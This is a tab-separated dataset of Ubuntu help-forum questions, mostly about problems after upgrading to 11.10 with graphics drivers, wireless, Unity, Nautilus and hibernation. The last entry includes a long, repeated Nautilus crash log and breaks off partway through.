66852	mouse and keyboard not working after upgrading to 11.10	after upgrading to ubuntu 11.10 , neither my keyboard nor my mouse work anymore . the keyboard works during the boot process , but stops working as soon as the login screen appears . i 'm stuck there because without a mouse or a keyboard i ca n't login or start a shell . if i hit esc during startup to make the grub manager appear , the manager appears , but the keyboard wo n't work anymore . mouse : logitech rx 250 , keyboard : cherry rs 6000
66853	how to sync ipod touch with ios 5 ?	i have an ipod touch with ios 5 and i want to be able to put music and and videos on it but never figured out how . can someone help me ?
66856	wubi 11.10 freezes during installation	wubi freezes when it 's almost done copying files . the cursor still has the spinning animation , but everything becomes unresponsive to mouse clicks . any idea how to fix this ?
66858	display resolution with nvidia	i 'm using a leadtek winfast a340 agp 8x graphics card ( nvidia geforce fx 5200 ) and a monitor that has a resolution of 1280x1024 . without installing additional drivers the available display resolutions are 1024x768 and 800x600 . if i activate an nvidia accelerated graphics driver , e.g . version 173 which was listed as recommended , only 640x480 is available . is there any way of activating , my using an alternative driver or other means , a 1280x1024 resolution option which matches the monitor ? i 've only been dabbling in ubuntu this last week so an answer suitable for a novice would be highly appreciated !
66867	graphics show up as unknown on a dell inspiron 1564	i have a dell inspiron 1564 i3 330m . i dual boot it with windows 7 and ubuntu . prior to installing oneiric , i had the 32 bit version of natty installed . everything used to work fine . however , with the release of oneiric , i decided to install the 64-bit version , but so far , my experience has been very bad . it refuses to recognize the integrated intel hd graphics . in system info , in the graphics section , it says that the drivers are unknown and the experience is standard . in natty , however , it correctly gave my graphics as intel hd graphics.so how do i get the os to recognize my intel hd graphics ? i have all the latest updates .
66870	how to disable password on hibernate/suspend ?	i have installed ubuntu 11.10 and on suspend/hibernate i am asked for password . i could n't find apps > gnome-power-manager > lock in gconf-editor . what 's the solution for this ?
66872	wireless not working with a rtl8191sevb	my wireless is not working in ubuntu 11.10 and it worked fine in 11.04 , i 've done a fresh install and it detects the wireless but when i try to connect it keeps asking for the wpa key.can anyone help me ? i 've tried to download the drivers from the realtek site but i get an error when i do `` sudo make '' i 'm using a 64bit and i 've tried the 32bit and nothing solves the problem . my wireless card : rtl8191sevb
66873	wireless 2915abg not working on a dell xps m140	i installed ubuntu 11.10 and i am trying to connect my laptop through wifi . but the wireless is n't working . my wilreless is : intel corporation pro/wireless 2915abg [ calexico2 ] network connection ( rev 05 ) my laptop is a dell xps m140
66875	how to disable multiarch support ?	i do n't want to install any i386 package . is there any way to disable functionality ?
66879	how do i fix hibernate ?	suspend and hibernate was not working in my ubuntu 11.04 and i followed these instructions to fix the issue by installing uswsusp . the commands s2ram and s2disk were working fine for me and hence i replaced the contents of hal-system-power-suspend-linux and hal-system-power-hibernate-linux as directed in the above link . now after my upgrade to ubuntu 11.10 , i am unable to hibernate my system . how to rectify this issue ? is there any config file which i need to change for hibernate to function properly ?
66881	safe to remove evolution ?	i automatically upgraded from 11.04 to 11.10 but never used evolution . now that thunderbird is the default mail client ; can i remove evolution completely , safely ? did it come pre-installed on 11.10 ? i remember that if i pressed the time on the top bar evolution set up assistant opened up . is there a substitute for this ? any suggestion is greatly appreciated .
66882	how can i stop the side launcher from autohiding ?	how can i get the side menu on my left to stay in place ? and since it 's going to stay in place , how can i ensure my application windows do n't get hidden ( in part ) by the menu ( ie : their width should be my horizontal resolution - width of the menu ) ?
66884	how can i enable video-driver accelerated resolution to grub2 menu ?	how can i enable driver accelerated resolution to grub2 ? after installing proprietary nvidia driver my splash-screen resolution is changed to some lower value . typing vbeinfo at grub2 command shell shows the supported resolution up to 1024x768x32 but my screen resolution is 1360x768 . can i enable this resolution somehow in grub2 ? what i 've found that grub2 screen supports the vbe supported resolutions only ; as i 've stated earlier 1360x768x32 is not listed in my vbeinfo o/p . so is that a no-go for me ? and is there any way to load nvidia module before plymouth , it 's still in fall-back mode , but on another pc intel 's i915 module with i915.modeset=1 is working fine .
66885	can not execute .run file	i 'm running ubuntu 11.10 64-bit , and i can not execute .run files . i get a message saying that there is no application installed to open the file .
66886	how to enable the update notification in the unity notification area ?	in classic gnome , we used to have a special notification that appears in the notification area every time system updates are available ; i do n't see any update notification in unity . how to enable it so i do n't have to check for updates myself ? thanks .
66890	how can i make a specific set of iptables rules permanent ?	is there a `` best practice '' or standard to make a few iptables rules permanent ? i mean : automatically applied upon a system reboot ? i am using a vps with ubuntu server 10.04 lts ( lucid lynx ) . thank you . big edit : i do n't want any rule to be persisted ( like iptables-persistent package does ) . i want only my own specific set to be reloaded ... if other rules are eventually added by running iptables , these should be discarded ...
66891	how to stop network manager from continually prompting for wireless password	how do you prevent network manager from continually prompting for wireless password when it tries to reconnect after the connection temporarily drops ? unlike this post , this happens for me without suspending . my wireless wpa2 connection might drop a couple times , and nm will automatically reconnect . however , eventually nm will start prompting for the password ... which is already filled in . clicking `` show password '' confirms it 's already the correct password , and clicking `` connect '' without changing anything also successfully connects . why is it doing this , and how do i stop it ? it 's driving me crazy . wicd does n't do this , but it has a lot of other problems , so i 'd rather stick with nm if i could resolve this issue .
66895	what does `` i915_program_error : exceeded max nr indirect texture lookups '' mean and can i solve it ?	in trying to run the game braid , i get a black screen and a mouse cursor , which i then have to kill . i donwloaded the game .deb via the humble bundle , ran it and software center open , dl'ed an extra 18.x mb and said the game was installed . i have tried numerous things , like running it windowed ( /opt/braid/braid -windowed ) and with specific resolution ( as suggested here ) , but it does not solve the problem . i have also tried running it sudo as suggested somewhere . i get the same error no matter what : i915_program_error : exceeded max nr indirect texture lookups ( 8 out of 4 ) i915_program_error : exceeded max nr indirect texture lookups ( 8 out of 4 ) i915_program_error : exceeded max alu instructions ( 83 out of 64 ) while it 's running , and after killing it i get : x error of failed request : baddrawable ( invalid pixmap or window parameter ) major opcode of failed request : 136 ( dri2 ) minor opcode of failed request : 8 ( dri2swapbuffers ) resource id in failed request : 0x3e0000f serial number of failed request : 158 current serial number in output stream : 158 i have 00:02.0 vga compatible controller : intel corporation mobile 945gm/gms , 943/940gml express integrated graphics controller ( rev 03 ) 00:02.1 display controller : intel corporation mobile 945gm/gms/gme , 943/940gml express integrated graphics controller ( rev 03 ) and system info under graphics says my driver is intel速 945gm x86/mmx/sse2 . i run a clean install of ubuntu 11.10 , installed on a laptop with an external monitor . what does the error message mean , and can i solve this problem and play the game ? kind regards , and thanks in advance for any suggestions . -- r
66897	how can i create a launcher in 11.10 ?	after i upgraded to 11.10 , the create new launcher option has disappeared from the menu ( right click anywhere on desktop ) . it also does n't look like the `` finder '' can find anything named `` launcher '' so how can i create a launcher on the desktop in 11.10 ?
66907	touchpad not working on msi u130 after login in	i have just upgraded to 11.10 but my msi u130 's touchpad does n't work after login to 11.10 . it works fine in the login screen where one types password to login . thank you in advance .
66908	gvim dissapears when minimized and no way to maximize again	i am using gvim , installed using apt-get , and whenever i minimize the window it gets lost . the program is executing because i can see it in the monitor , but there is no way to bring back the editor . in fact in the dock it never appears as if it had been open . is there a way to fix this ? thanks ! ( using unity with ubuntu oneric ocelot )
66910	what happened to to the startup application preferences ?	in 11.04 i can go to system- > preferences - > startup applications and do things like uncheck gnome login sound when i open startup applications in 11.10 the screen is empty
66913	nautilus uses all my cpu memory	nautilus is using all my cpu in ubuntu 11.10 ! ! ! ! please help , i 'm extremely mad and i ca n't use this distro . i use a intel core i7 processor . everything worked fine the first 10 or 15 hrs after installing . i reinstalled it one time because of this and now it reappeared . i 'm mad as hell , i ca n't use nautilus at all , it responses with a 5-10 seconds of delay . help !
66914	how to change desktop background from command line in unity ?	i have a script that updates my desktop background every day with the nasa apod . since upgrading to 11.10 , that script stopped working , presumably because i 'm using gconftool-2 to actually update the desktop background . is there a new way to do this under unity ?
66919	how do i improve boot time ?	i have read many question on this but it is all about disabling startup daemons/programs . since then i have installed a lot of programs and as you know some programs adds some stuffs to startup . i need specific help to disable all processes that can not affect my computer normal operation and start others when needed . now i need a command to log list of startup app so that i can post them here and you guys can help me what to disable and what to leave .
66920	is it possible to remove the dash window control buttons ?	is it possible to change or remove the unity dash window control buttons ( close , minimize , maximize ) in ubuntu 11.10 ? i 'm not a huge fan of how they look and would like to swap them out if possible .
66922	decrease boot time	i have an 11.10 system that takes a while to boot . i ran bootchart and it reported that there was a block of time about 10 seconds long where there was no system activity besides init whereas other ubuntu bootcharts that i have seen only have a 1 or 2 second gap . what i want to do is increase my boot speed by decreasing that gap . any suggestions
66924	how to change the default monospaced font ?	in oneiric ocelot , the default monospaced font in `` ubuntu mono '' with size 13 ; i can see it from the gedit preferences . in this screenshot you can also see this font : the 13 size is too large for me , and i do n't like changing it in every program that use system font . how can i see and change this default font configution ? in the control panel there is now only the theme selection , without any customization feature ( and i think this is very bad for a linux os ... ) . thank you
66927	nautilus missing toolbar , stuck in text-only `` location bar '' mode after 11.10 upgrade	after upgrading to 11.10 , nautilus is only giving me a text-only location box to select files . how can i get the toolbar ( with the `` up to parent '' , `` home '' , etc buttons ) back ? or failing that , is there a way to switch to breadcrumb mode ? i have already tried changing my gconf preferences for nautilus -- always_use_location_entry and start_with_location_bar are disabled , and start_with_toolbar is enabled .
66928	i can not set up dual monitors to work with 11.10 using amdcccle 11.9	i 've installed the ati catalyst drivers 11.9 manually because the default ones do n't work with gnome-shell . but when that i try to change the settings in amdcccle ( adminstrative ) to use multi-display , the application closes and does n't change anything or asks me to confirm and still does n't save at all . this is my xorg.conf http : //pastebin.com/p5xmnkfm how can i fix this ?
66934	passenger ( mod-rails ) ca n't find libopenssl-ruby	trying to build an nginx server with phusion passenger on ubuntu 11.10 ( hurray for the new version ! ) . running `` passenger-install-nginx-module '' outputs the following error : * openssl support for ruby ... not found with the following suggestion to fix it : * to install openssl support for ruby : please run apt-get install libopenssl-ruby as root . running `` sudo apt-get install libopenssl-ruby '' yields the following output : reading package lists ... done building dependency tree reading state information ... done note , selecting 'libruby ' instead of 'libopenssl-ruby' libruby is already the newest version . 0 upgraded , 0 newly installed , 0 to remove and 0 not upgraded . a little research shows that libruby is a virtual package that provides libopenssl-ruby as part of the package . however , the passenger-install-nginx-module script still ca n't find it , and keeps throwing the same error . help me , please ! i 'm in a little over my head on this one , and the google-the-error-code method that usually works is failing me today .
66935	how to get previous behaviour of alt-tab task switcher in 11.10	when i press alt+tab the task switcher appears . unfortunately , the behaviour in 11.10 has changed . previously , in 11.04 , i would see all applications , i could see if an application was minimised ( it would only show the icon ) and i would see a preview of the window . now , in 11.10 , i only see a list of icons , i can see if more than one is actually started ( by checking the small arrows on the side -- as on the dash ) . i do not see a preview . for the preview i either have to wait . long . afaik this time is not configurable . or i press alt+` then the preview appears immediately , but unfortunately there is no way to then return to my list ( and continue cycling through the list ) . pressing alt+tab again has no effect . is there an alternative task-switcher ? is there a way to get back to the task switcher from 11.04 ?
66949	driver radeon hd 5770 locking	okay ? i was amazed ubuntu 11.10 , but my nightmare is when i install the driver of my vga . i have a radeon hd 5770 and install the driver that ubuntu recommends itself . after i install the driver and restart the computer to apply the changes is catching too ! when i go to change my wallpaper effect `` fade '' is locked , when i select something is crashing too . the dash does not come softer side , ta very complicated ... does anyone have any possible solution ? i had the same problem with 11.04 and left and ended up going back to windows ... thanks ! you are cool ! -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- - português brasil olá pessoal , tudo bem ? achei incrível o ubuntu 11.10 , porém meu pesadelo é quando eu instalo o driver da minha vga . tenho uma radeon hd 5770 e instalo o driver que o próprio ubuntu recomenda . depois que instalo o driver e reinicio o computador para aplicar as alterações fica travando demais ! quando eu vou alterar meu papel de parede o efeito `` fade '' fica travando , quando vou selecionar algo fica travando também . o dash lateral não vem mais suave , ta bem complicado ... alguém tem alguma possível solução ? tive o mesmo problema com o 11.04 e abandonei e acabei voltando para o windows ... valeu ! vocês são demais !
66950	super key not opening dash	i just cleanly installed ubuntu 11.10 ( with new , clean home folder ) the super key no longer calls up the dash . was this behaviour changed since the previous release ?
66951	how to set user rights in 11.10 ?	i remember having a list of options of what a user can do in previous versions . for example , i want a standard user to be able to mount disks . how can that be done in oneiric ocelot ? here is a link to documentation of what was used previously .
66954	why i do not have gnome shell with gnome 3 ?	i want a help to clear my concept about the difference between gnome and gnome shell . i found gnome shell is not installed on my ubuntu 11.10 . i upgraded from ubuntu 11.04 . why it is that ? gnome shell is not shipped with gnome 3 . and why i need gnome shell ? what extra capabilities i will get on desktop while installing shell . tahir @ stonecode : ~ $ gnome-shell -- version the program 'gnome-shell ' is currently not installed . you can install it by typing : sudo apt-get install gnome-shell
66957	restoring the skype contact window	if i close the skype window , how do i get it back ? clicking the skype icon on the launcher just tries to create a new skype instance . the only way i can get it back is by killing it via the terminal and re-launching it .
66959	world of wacraft on playonlinux graphics problem	i have an hp 430 and lshw -c video command line said : *-display description : vga compatible controller product : 2nd generation core processor family integrated graphics controller vendor : intel corporation physical id : 2 bus info : pci @ 0000:00:02.0 version : 09 width : 64 bits clock : 33mhz capabilities : vga_controller bus_master cap_list rom configuration : driver=i915 latency=0 resources : irq:42 memory : c0000000-c03fffff memory : b0000000-bfffffff ioport:4000 ( size=64 ) warning : output may be incomplete or inaccurate , you should run this program as super-user . i 'm running this at ubuntu oneiric ocelot 11.10 and playonlinux 4.0.12 . here 's an image that might be helpful :
66960	online account does not show all google calendars	i added a google account to the `` online accounts '' manager of ubuntu . my google account has 3 calendars . one private , school and work . currently only the items from my private calendar are shown in the gnome 3.2 calendar . i would however very much like to display my school calendar as well in the gnome 3.2 calendar . is this possible ? if the answer is yes , how can i do this ? ps . when this is not possible where can i comment to request this as a new feature of the upcoming gnome version ?
66961	gnome shell glitched top bar ubuntu 11.10	i am having a similar problem with gnome shell as this question : ati incompatible with gnome-shell ? however mine is slightly stranger . unfortunately i ca n't take a screenshot ( if i do all you can see is the background ) , but for me the background of the top bar is the file edit view etc menu from unity . the buttons do n't actually work and are not clickable . fonts , text etc looks the same as in the question mentioned above . this is really frustrating as i really want to use gnome shell . it appears the problem is with fgrlx , but i hope that by now there is a fix . also please not that the activities screen ( with the applications and the search , etc ) is absolutely fine . context menus and tooltips are glitched and skewed all around the system however .
66966	how to improve performances	i have seen this question , but that question seems to be obsolete with the 11.10 version . last week , i upgraded from 11.04 to 11.10 . i am usually using gnome desktop clasic ( without effects , also called the fail-safe ) , because my pc is very bad . since the upgrade , everything is so slow . i also noticed that the temperature of the graphical chip* went from 30-40 c to 60 c , so my guess that the ubuntu 11.10 demands very powerful gpu . so , what can be done to improve the performances of ubuntu 11.10 ? logging in using fail safe option is one thing , but it is not enough . *the temperature of the gpu can be seen from the nvidia-settings under the thermal settings .
66969	how to port email from evolution to thunderbird ?	i updated ubuntu to 11.10 using the update notification . i am also switching from xubuntu to ubuntu - gnome interface . i have been using evolution for years and would like to port the emails to thunderbird . i have looked at the similar questions with no luck and the thunderbird help on manually importing . most of these assume that the evolution file structure is similar to the evolution file structure . when i set up thunderbird it seems to have imported the contacts from evolution ( and actually removed them from evolution . however no mail got transferred . i found the evolution mail in ~/.local/share/evolution/mail/local . this has folders.db and 3 directories - cur , tmp , and new . then there are the hidden files and directories . each directory has three related files with extensions .cmeta , .ibex.index , and .ibex.index.data . then all the directories had files that seem to contain the individual messages . i have not looked at rhyme or reason to the file numbering/naming scheme . is there a nice way to import these files ?
66978	how do i tell when a window demands attention ?	unfortunately , it appears unity 's subtle persistent urgency indicator has disappeared in oneiric - so i 'm now considering writing a replacement as panel/indicator applet . however , i have no idea how to get notified when a window demands attention ( or when such demands become obsolete due to the respective window being focused ) . some research suggests i 'll have to hook into d-bus , but i know neither where nor how . any pointers would be appreciated .
66980	problems running a windows app in wine	when i download the leagueoflegends.exe from leagueoflegends.exe and trying to run it with the last version of wine , i get nothing , not even an error . ( wine works fine with other .exe files ) anybody knows something ? i am using ubuntu 11.10 64-bit .
66982	remastersys+wubi onto customised lucid ubuntu distro	im developing customised distro based on ubuntu and i want to integrate wubi into it and i tried one tutorial from here http : //ubuntuforums.org/showthread.php ? t=1062504 but its for hardy and im working for lucid and code of lucid wubi is diff . from hardy version.plz help me for wubi ? ? ?
66984	gnome 3.2 screen keyboard , when opened onboard pops up	when i enable the `` screen keyboard '' from the accessibility next to that the gnome onscreen keyboard is started onboard is also opened . is there a way to prevent this ? !
66988	how do i cleanup old packages and apps after upgrading ?	from an older query i found that sudo apt-get autoremove should be used . i did that and some packages got removed . but the applications computer janitor and pitivi are still present on the computer ( not supposed to be in 11.10 from what i read ) , which made me doubt as to whether there are other unnecessary packages\ old apps still present . is there any way to clear up these applications and packages ? thanks !
66989	ubuntu 11.10 network speed	just upgraded to 11.10 from 11.04 . my internet speed is very slow now . i did a speed test with two similar laptops . the one running windows has a download speed of 14mb/s while the one running ubuntu does not exceed .09 mb/s ( on the same network ) . i never had an issue with 11.04 ... . help
66991	how do i enable 3d effects on a sony vaio e series ?	i have a sony vaio e series laptop [ vpceb24en ] with ati radeon graphic card . i have installed ubuntu 11.10 and tried to activate the compiz effects . i am not able to activate the special effects [ 3d effects ] , and when i restarted my system i am not able to start any applications and i re-installed ubuntu . in the previous version [ 11.04 ] also i was facing the same issue . but in ubuntu 10.10 , all the compiz effects are working properly for me . please help .
66993	nautilus keeps force closing	when opening a folder , nautilus randomly closes . i am using ubuntu 64bit unity . does anyone know where i can start ? thanks running nautilus in terminal , until crash . all icons on desktop go , left click disables too . ( nautilus:6042 ) : glib-gobject-critical ** : g_value_get_object : assertion `g_value_holds_object ( value ) ' failed ( nautilus:6042 ) : glib-gobject-critical ** : g_value_get_object : assertion `g_value_holds_object ( value ) ' failed ( nautilus:6042 ) : glib-gobject-critical ** : g_value_get_object : assertion `g_value_holds_object ( value ) ' failed ( nautilus:6042 ) : glib-gobject-critical ** : g_value_get_object : assertion `g_value_holds_object ( value ) ' failed ( nautilus:6042 ) : glib-gobject-critical ** : g_value_get_object : assertion `g_value_holds_object ( value ) ' failed ( nautilus:6042 ) : glib-gobject-critical ** : g_value_get_object : assertion `g_value_holds_object ( value ) ' failed ( nautilus:6042 ) : glib-gobject-critical ** : g_value_get_object : assertion `g_value_holds_object ( value ) ' failed ( nautilus:6042 ) : glib-gobject-critical ** : g_value_get_object : assertion `g_value_holds_object ( value ) ' failed ( nautilus:6042 ) : glib-gobject-critical ** : g_value_get_object : assertion `g_value_holds_object ( value ) ' failed ( nautilus:6042 ) : glib-gobject-critical ** : g_value_get_object : assertion `g_value_holds_object ( value ) ' failed ( nautilus:6042 ) : glib-gobject-critical ** : g_value_get_object : assertion `g_value_holds_object ( value ) ' failed ( nautilus:6042 ) : glib-gobject-critical ** : g_value_get_object : assertion `g_value_holds_object ( value ) ' failed ( nautilus:6042 ) : glib-gobject-critical ** : g_value_get_object : assertion `g_value_holds_object ( value ) ' failed ( nautilus:6042 ) : glib-gobject-critical ** : g_value_get_object : assertion `g_value_holds_object ( value ) ' failed ( nautilus:6042 ) : glib-gobject-critical ** : g_value_get_object : assertion `g_value_holds_object ( value ) ' failed ( nautilus:6042 ) : glib-gobject-critical ** : g_value_get_object : assertion `g_value_holds_object ( value ) ' failed ( nautilus:6042 ) : glib-gobject-critical ** : g_value_get_object : assertion `g_value_holds_object ( value ) ' failed ( nautilus:6042 ) : glib-gobject-critical ** : g_value_get_object : assertion `g_value_holds_object ( value ) ' failed ( nautilus:6042 ) : glib-gobject-critical ** : g_value_get_object : assertion `g_value_holds_object ( value ) ' failed ( nautilus:6042 ) : glib-gobject-critical ** : g_value_get_object : assertion `g_value_holds_object ( value ) ' failed ( nautilus:6042 ) : glib-gobject-critical ** : g_value_get_object : assertion `g_value_holds_object ( value ) ' failed ( nautilus:6042 ) : glib-gobject-critical ** : g_value_get_object : assertion `g_value_holds_object ( value ) ' failed ( nautilus:6042 ) : glib-gobject-critical ** : g_value_get_object : assertion `g_value_holds_object ( value ) ' failed ( nautilus:6042 ) : glib-gobject-critical ** : g_value_get_object : assertion `g_value_holds_object ( value ) ' failed ( nautilus:6042 ) : glib-gobject-critical ** : g_value_get_object : assertion `g_value_holds_object ( value ) ' failed ( nautilus:6042 ) : glib-gobject-critical ** : g_value_get_object : assertion `g_value_holds_object ( value ) ' failed ( nautilus:6042 ) : glib-gobject-critical ** : g_value_get_object : assertion `g_value_holds_object ( value ) ' failed ( nautilus:6042 ) : glib-gobject-critical ** : g_value_get_object : assertion `g_value_holds_object ( value ) ' failed ( nautilus:6042 ) : glib-gobject-critical ** : g_value_get_object : assertion `g_value_holds_object ( value ) ' failed ( nautilus:6042 ) : glib-gobject-critical ** : g_value_get_object : assertion `g_value_holds_object ( value ) ' failed ( nautilus:6042 ) : glib-gobject-critical ** : g_value_get_object : assertion `g_value_holds_object ( value ) ' failed ( nautilus:6042 ) : glib-gobject-critical ** : g_value_get_object : assertion `g_value_holds_object ( value ) ' failed ( nautilus:6042 ) : glib-gobject-critical ** : g_value_get_object : assertion `g_value_holds_object ( value ) ' failed ( nautilus:6042 ) : glib-gobject-critical ** : g_value_get_object : assertion `g_value_holds_object ( value ) ' failed ( nautilus:6042 ) : glib-gobject-critical ** : g_value_get_object : assertion `g_value_holds_object ( value ) ' failed ( nautilus:6042 ) : glib-gobject-critical ** : g_value_get_object : assertion `g_value_holds_object ( value ) ' failed ( nautilus:6042 ) : glib-gobject-critical ** : g_value_get_object : assertion `g_value_holds_object ( value ) ' failed ( nautilus:6042 ) : glib-gobject-critical ** : g_value_get_object : assertion `g_value_holds_object ( value ) ' failed ( nautilus:6042 ) : glib-gobject-critical ** : g_value_get_object : assertion `g_value_holds_object ( value ) ' failed ( nautilus:6042 ) : glib-gobject-critical ** : g_value_get_object : assertion `g_value_holds_object ( value ) ' failed ( nautilus:6042 ) : glib-gobject-critical ** : g_value_get_object : assertion `g_value_holds_object ( value ) ' failed ( nautilus:6042 ) : glib-gobject-critical ** : g_value_get_object : assertion `g_value_holds_object ( value ) ' failed ( nautilus:6042 ) : glib-gobject-critical ** : g_value_get_object : assertion `g_value_holds_object ( value ) ' failed ( nautilus:6042 ) : glib-gobject-critical ** : g_value_get_object : assertion `g_value_holds_object ( value ) ' failed ( nautilus:6042 ) : glib-gobject-critical ** : g_value_get_object : assertion `g_value_holds_object ( value ) ' failed ( nautilus:6042 ) : glib-gobject-critical ** : g_value_get_object : assertion `g_value_holds_object ( value ) ' failed ( nautilus:6042 ) : glib-gobject-critical ** : g_value_get_object : assertion `g_value_holds_object ( value ) ' failed ( nautilus:6042 ) : glib-gobject-critical ** : g_value_get_object : assertion `g_value_holds_object ( value ) ' failed ( nautilus:6042 ) : glib-gobject-critical ** : g_value_get_object : assertion `g_value_holds_object ( value ) ' failed ( nautilus:6042 ) : glib-gobject-critical ** : g_value_get_object : assertion `g_value_holds_object ( value ) ' failed ( nautilus:6042 ) : glib-gobject-critical ** : g_value_get_object : assertion `g_value_holds_object ( value ) ' failed ( nautilus:6042 ) : glib-gobject-critical ** : g_value_get_object : assertion `g_value_holds_object ( value ) ' failed ( nautilus:6042 ) : glib-gobject-critical ** : g_value_get_object : assertion `g_value_holds_object ( value ) ' failed ( nautilus:6042 ) : glib-gobject-critical ** : g_value_get_object : assertion `g_value_holds_object ( value ) ' failed ( nautilus:6042 ) : glib-gobject-critical ** : g_value_get_object : assertion `g_value_holds_object ( value ) ' failed ( nautilus:6042 ) : glib-gobject-critical ** : g_value_get_object : assertion `g_value_holds_object ( value ) ' failed ( nautilus:6042 ) : glib-gobject-critical ** : g_value_get_object : assertion `g_value_holds_object ( value ) ' failed ( nautilus:6042 ) : glib-gobject-critical ** : g_value_get_object : assertion `g_value_holds_object ( value ) ' failed ( nautilus:6042 ) : glib-gobject-critical ** : g_value_get_object : assertion `g_value_holds_object ( value ) ' failed ( nautilus:6042 ) : glib-gobject-critical ** : g_value_get_object : assertion `g_value_holds_object ( value ) ' failed ( nautilus:6042 ) : glib-gobject-critical ** : g_value_get_object : assertion `g_value_holds_object ( value ) ' failed ( nautilus:6042 ) : glib-gobject-critical ** : g_value_get_object : assertion `g_value_holds_object ( value ) ' failed ( nautilus:6042 ) : glib-gobject-critical ** : g_value_get_object : assertion `g_value_holds_object ( value ) ' failed ( nautilus:6042 ) : glib-gobject-critical ** : g_value_get_object : assertion `g_value_holds_object ( value ) ' failed ( nautilus:6042 ) : glib-gobject-critical ** : g_value_get_object : assertion `g_value_holds_object ( value ) ' failed ( nautilus:6042 ) : glib-gobject-critical ** : g_value_get_object : assertion `g_value_holds_object ( value ) ' failed ( nautilus:6042 ) : glib-gobject-critical ** : g_value_get_object : assertion `g_value_holds_object ( value ) ' failed ( nautilus:6042 ) : glib-gobject-critical ** : g_value_get_object : assertion `g_value_holds_object ( value ) ' failed ( nautilus:6042 ) : glib-gobject-critical ** : g_value_get_object : assertion `g_value_holds_object ( value ) ' failed ( nautilus:6042 ) : glib-gobject-critical ** : g_value_get_object : assertion `g_value_holds_object ( value ) ' failed ( nautilus:6042 ) : glib-gobject-critical ** : g_value_get_object : assertion `g_value_holds_object ( value ) ' failed ( nautilus:6042 ) : glib-gobject-critical ** : g_value_get_object : assertion `g_value_holds_object ( value ) ' failed ( nautilus:6042 ) : glib-gobject-critical ** : g_value_get_object : assertion `g_value_holds_object ( value ) ' failed ( nautilus:6042 ) : glib-gobject-critical ** : g_value_get_object : assertion `g_value_holds_object ( value ) ' failed ( nautilus:6042 ) : glib-gobject-critical ** : g_value_get_object : assertion `g_value_holds_object ( value ) ' failed ( nautilus:6042 ) : glib-gobject-critical ** : g_value_get_object : assertion `g_value_holds_object ( value ) ' failed ( nautilus:6042 ) : glib-gobject-critical ** : g_value_get_object : assertion `g_value_holds_object ( value ) ' failed ( nautilus:6042 ) : glib-gobject-critical ** : g_value_get_object : assertion `g_value_holds_object ( value ) ' failed ( nautilus:6042 ) : glib-gobject-critical ** : g_value_get_object : assertion `g_value_holds_object ( value ) ' failed ( nautilus:6042 ) : glib-gobject-critical ** : g_value_get_object : assertion `g_value_holds_object ( value ) ' failed ( nautilus:6042 ) : glib-gobject-critical ** : g_value_get_object : assertion `g_value_holds_object ( value ) ' failed ( nautilus:6042 ) : glib-gobject-critical ** : g_value_get_object : assertion `g_value_holds_object ( value ) ' failed ( nautilus:6042 ) : glib-gobject-critical ** : g_value_get_object : assertion `g_value_holds_object ( value ) ' failed ( nautilus:6042 ) : glib-gobject-critical ** : g_value_get_object : assertion `g_value_holds_object ( value ) ' failed ( nautilus:6042 ) : glib-gobject-critical ** : g_value_get_object : assertion `g_value_holds_object ( value ) ' failed ( nautilus:6042 ) : glib-gobject-critical ** : g_value_get_object : assertion `g_value_holds_object ( value ) ' failed ( nautilus:6042 ) : glib-gobject-critical ** : g_value_get_object : assertion `g_value_holds_object ( value ) ' failed ( nautilus:6042 ) : glib-gobject-critical ** : g_value_get_object : assertion `g_value_holds_object ( value ) ' failed ( nautilus:6042 ) : glib-gobject-critical ** : g_value_get_object : assertion `g_value_holds_object ( value ) ' failed ( nautilus:6042 ) : glib-gobject-critical ** : g_value_get_object : assertion `g_value_holds_object ( value ) ' failed ( nautilus:6042 ) : glib-gobject-critical ** : g_value_get_object : assertion `g_value_holds_object ( value ) ' failed ( nautilus:6042 ) : glib-gobject-critical ** : g_value_get_object : assertion `g_value_holds_object ( value ) ' failed ( nautilus:6042 ) : glib-gobject-critical ** : g_value_get_object : assertion `g_value_holds_object ( value ) ' failed ( nautilus:6042 ) : glib-gobject-critical ** : g_value_get_object : assertion `g_value_holds_object ( value ) ' failed ( nautilus:6042 ) : glib-gobject-critical ** : g_value_get_object : assertion `g_value_holds_object ( value ) ' failed ( nautilus:6042 ) : glib-gobject-critical ** : g_value_get_object : assertion `g_value_holds_object ( value ) ' failed ( nautilus:6042 ) : glib-gobject-critical ** : g_value_get_object : assertion `g_value_holds_object ( value ) ' failed ( nautilus:6042 ) : glib-gobject-critical ** : g_value_get_object : assertion `g_value_holds_object ( value ) ' failed ( nautilus:6042 ) : glib-gobject-critical ** : g_value_get_object : assertion `g_value_holds_object ( value ) ' failed ( nautilus:6042 ) : glib-gobject-critical ** : g_value_get_object : assertion `g_value_holds_object ( value ) ' failed ( nautilus:6042 ) : glib-gobject-critical ** : g_value_get_object : assertion `g_value_holds_object ( value ) ' failed ( nautilus:6042 ) : glib-gobject-critical ** : g_value_get_object : assertion `g_value_holds_object ( value ) ' failed ( nautilus:6042 ) : glib-gobject-critical ** : g_value_get_object : assertion `g_value_holds_object ( value ) ' failed ( nautilus:6042 ) : glib-gobject-critical ** : g_value_get_object : assertion `g_value_holds_object ( value ) ' failed ( nautilus:6042 ) : glib-gobject-critical ** : g_value_get_object : assertion `g_value_holds_object ( value ) ' failed ( nautilus:6042 ) : glib-gobject-critical ** : g_value_get_object : assertion `g_value_holds_object ( value ) ' failed ( nautilus:6042 ) : glib-gobject-critical ** : g_value_get_object : assertion `g_value_holds_object ( value ) ' failed ( nautilus:6042 ) : glib-gobject-critical ** : g_value_get_object : assertion `g_value_holds_object ( value ) ' failed ( nautilus:6042 ) : glib-gobject-critical ** : g_value_get_object : assertion `g_value_holds_object ( value ) ' failed ( nautilus:6042 ) : glib-gobject-critical ** : g_value_get_object : assertion `g_value_holds_object ( value ) ' failed ( nautilus:6042 ) : glib-gobject-critical ** : g_value_get_object : assertion `g_value_holds_object ( value ) ' failed ( nautilus:6042 ) : glib-gobject-critical ** : g_value_get_object : assertion `g_value_holds_object ( value ) ' failed ( nautilus:6042 ) : glib-gobject-critical ** : g_value_get_object : assertion `g_value_holds_object ( value ) ' failed ( nautilus:6042 ) : glib-gobject-critical ** : g_value_get_object : assertion `g_value_holds_object ( value ) ' failed ( nautilus:6042 ) : glib-gobject-critical ** : g_value_get_object : assertion `g_value_holds_object ( value ) ' failed ( nautilus:6042 ) : glib-gobject-critical ** : g_value_get_object : assertion `g_value_holds_object ( value ) ' failed ( nautilus:6042 ) : 